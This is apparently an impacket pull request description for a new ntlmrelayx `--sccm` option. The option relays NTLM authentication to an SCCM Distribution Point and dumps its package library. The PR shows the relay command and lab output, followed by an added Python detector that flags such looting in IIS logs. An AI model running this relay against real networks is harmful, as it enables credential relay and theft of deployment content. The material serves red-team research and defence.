impacket
feat: ✨ Adding SCCM Distribution Point (HTTP) to NTLMRelayx
This PR adds an SCCM attack primitive presented at the Red Team Village in DEFCON32.
TL;DR - You can authenticate to the HTTP service of a Config Manager (SCCM) Distribution point, and extract all of the packages there.
This PR adds:
- New `--sccm` module - You're able to NTLM relay to the HTTP service of the distribution point if authentication is enabled. If authentication is not enabled (Anonymous Authentication enabled), check out sccm-http-looter
- Modified `ntlmrelayx.py` in the examples scripts
- Few other edits
I tried to follow the existing ADCS (ESC8-related) codebase that is in the master branch.
Happy to make it more robust if needed. :)
Demo
```
└─# python3 examples/ntlmrelayx.py -t http://10.2.10.12/SMS_DP_SMSPKG$/Datalib --sccm --sccm-dp-dump -smb2support
Impacket v0.12.0.dev1+20240801.104651.6d8dd858 - Copyright 2023 Fortra

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.2.10.13, attacking target http://10.2.10.12
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://10.2.10.12 as LUDUS/SCCM-SQL$ SUCCEED
[*] Dumping SCCM Distribution Point Files
[*] Getting Datalib listing...
[*] Getting Datalib listing from http://10.2.10.12/SMS_DP_SMSPKG$/Datalib...
[*] Data saved to 10.2.10.12_sccm_dump/Datalib.txt
[*] Extracting file names from Datalib listing...
[*] Getting file signatures...
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.2.10.13 controlled, but there are no more targets left!
[*] SCCM DP Looting complete!
```
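For defenders, the relay shown above leaves a recognisable trace on the Distribution Point itself: the IIS log records the `Datalib` listing and the per-package entries being fetched, authenticated as a machine account (`LUDUS\SCCM-SQL$` in the demo) but from a client address that is not that machine's own host, and anonymous 200s on `Datalib` indicate the auth-disabled case the PR points at sccm-http-looter for. The following script is an added detection example, not part of this PR or of impacket; the W3C log lines, the package IDs, the attacker address 10.2.10.50 and the account-to-host map are all constructed samples, and the `bulk_threshold` value is an assumption you would tune to your environment.

```python
"""Flag SCCM Distribution Point (HTTP) content enumeration in IIS W3C logs.

Added detection example (not impacket code). Alerts on:
  1. anonymous 200 responses under Datalib (authentication disabled on the DP),
  2. authenticated retrieval of the Datalib listing itself (directory enumeration),
  3. a machine account ($) authenticating from an address that is not its own host
     (the hallmark of a relayed NTLM authentication),
  4. one client pulling many distinct Datalib entries (bulk dump).
"""
import re
from collections import defaultdict

# Constructed mapping of machine accounts to the address they normally use.
# Assumption: a defender can build this from DHCP leases / asset inventory.
EXPECTED_HOST = {r"LUDUS\SCCM-SQL$": "10.2.10.13"}

# Path prefix of the DP's package data library (as used in the PR's demo).
DATALIB_RE = re.compile(r"^/SMS_DP_SMSPKG\$/Datalib(?:/|$)", re.IGNORECASE)

# Constructed IIS log excerpt: 10.2.10.50 (attacker) replays SCCM-SQL$ credentials.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2024-08-10 12:00:01 10.2.10.12 GET /SMS_DP_SMSPKG$/Datalib - 80 - 10.2.10.50 401
2024-08-10 12:00:02 10.2.10.12 GET /SMS_DP_SMSPKG$/Datalib - 80 LUDUS\SCCM-SQL$ 10.2.10.50 200
2024-08-10 12:00:03 10.2.10.12 GET /SMS_DP_SMSPKG$/Datalib/PKG00001 - 80 LUDUS\SCCM-SQL$ 10.2.10.50 200
2024-08-10 12:00:04 10.2.10.12 GET /SMS_DP_SMSPKG$/Datalib/PKG00002 - 80 LUDUS\SCCM-SQL$ 10.2.10.50 200
2024-08-10 12:00:05 10.2.10.12 GET /SMS_DP_SMSPKG$/Datalib/PKG00003 - 80 LUDUS\SCCM-SQL$ 10.2.10.50 200
2024-08-10 12:05:00 10.2.10.12 GET /SMS_DP_SMSPKG$/PKG00001/setup.exe - 80 LUDUS\WS01$ 10.2.10.21 200
"""


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue  # malformed or header-less line; skip rather than guess
        yield dict(zip(fields, parts))


def analyze(text, expected_host=EXPECTED_HOST, bulk_threshold=3):
    """Return a list of (alert_kind, client_ip, username, detail) tuples."""
    alerts = []
    seen = set()                       # de-duplicate per (kind, client, user)
    entries_per_client = defaultdict(set)

    def emit(kind, cip, user, detail):
        if (kind, cip, user) not in seen:
            seen.add((kind, cip, user))
            alerts.append((kind, cip, user, detail))

    for rec in parse_w3c(text):
        uri, user = rec["cs-uri-stem"], rec["cs-username"]
        cip, status = rec["c-ip"], rec["sc-status"]
        if not DATALIB_RE.match(uri) or status != "200":
            continue  # only successful reads of the data library matter here
        if user == "-":
            emit("anonymous_datalib_access", cip, user, uri)
        elif uri.rstrip("/").lower().endswith("/datalib"):
            emit("datalib_listing", cip, user, uri)
        if user.endswith("$") and expected_host.get(user, cip) != cip:
            emit("machine_account_from_unexpected_host", cip, user,
                 f"expected {expected_host[user]}")
        entries_per_client[(cip, user)].add(uri)

    for (cip, user), uris in entries_per_client.items():
        if len(uris) >= bulk_threshold:
            emit("bulk_datalib_retrieval", cip, user, f"{len(uris)} distinct entries")
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

Run against the constructed excerpt, the script raises three alerts for 10.2.10.50: the Datalib listing read, the SCCM-SQL$ account speaking from the wrong address, and the bulk retrieval of four entries; the ordinary client fetch by WS01$ from its own host is not flagged. The 401 that precedes the relayed 200 is the DP's NTLM challenge and is deliberately ignored, since a challenge alone is not evidence of anything.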